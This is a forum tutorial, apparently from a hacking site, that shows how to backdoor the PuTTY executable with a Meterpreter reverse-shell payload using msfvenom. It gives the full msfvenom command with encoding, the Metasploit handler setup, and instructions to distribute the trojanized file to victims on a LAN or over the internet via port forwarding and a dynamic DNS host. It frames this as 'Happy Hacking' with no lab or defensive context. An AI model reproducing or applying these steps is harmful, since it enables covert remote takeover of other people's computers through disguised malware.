x32x01
  • by x32x01 ||
Today, we’re going to create windows executable backdoor using Metasploit Exploitation Framework’s using msfvenom.
How To Backdoor Windows Executables Using Metasploit (Msfvenom)

How To Backdoor Windows Executables Using Metasploit​


First make sure Metasploit is already installed.​

If you’re using Mac/Linux you can install Metasploit by using this method. If you’re using Kali Linux then Metasploit is pre-installed on it.

For LAN/Wifi Networks:​

Now follow me step by step:
Attacker’s IP: 192.168.1.2
Victim’s IP: 192.168.1.x (within LAN network it might be any IP)

1- Open terminal and download putty using wget.
Code:
wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe

2- I was in root directory when i used above command. So, putty got downloaded in /root/ directory.
Now use msfvenom to backdoor this executable using the following command.
Code:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.14 LPORT=5555 > evilputty.exe
Screen-Shot-2016-12-08-at-11.50.24-pm.png
Above command will generate an EXE file with the name evilputty.exe. This is our backdoored executable file.

3- Start metasploit.
Code:
msfconsole

4- Start metasploit’s reverse handler to get a reverse connection.
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 5555
exploit

5- Distribute this evilputty.exe file in your LAN/Wifi network and wait for victim. When victim will open this evilputty.exe , you will get a reverse shell on your metasploit’s handler. Happy Hacking :)

For WAN Or Internet:​

To use this method over WAN/Internet, you need to forward your ports.

Follow my following tutorial for better understanding of metasploit’s working over internet.

If you successfully port forwarded and open your port.
Code:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=”YOUR PUBLIC IP ADDRESS” LPORT=5555 > evilputty.exe

You’re public ip address might not be static so in that case you should be using NO-IP DNS to get a static address.

Simple write your NO-IP Host in LHOST=example.noip.com

If you have any questions related to port forwarding or attacking in WAN Network please don’t forget to comment below!
 

Similar Threads

x32x01
Replies
0
Views
116
x32x01
x32x01
x32x01
Replies
0
Views
217
x32x01
x32x01
x32x01
Replies
0
Views
634
x32x01
x32x01
x32x01
Replies
0
Views
304
x32x01
x32x01
x32x01
  • x32x01
Replies
0
Views
257
x32x01
x32x01
TAGs: Tags
backdoor backdoor windows executables metasploit msfvenom

Register & Login Faster

Forgot your password?

Latest Resources

Forum Statistics

Threads
517
Messages
518
Members
45
Latest Member
Tacola
Back
Top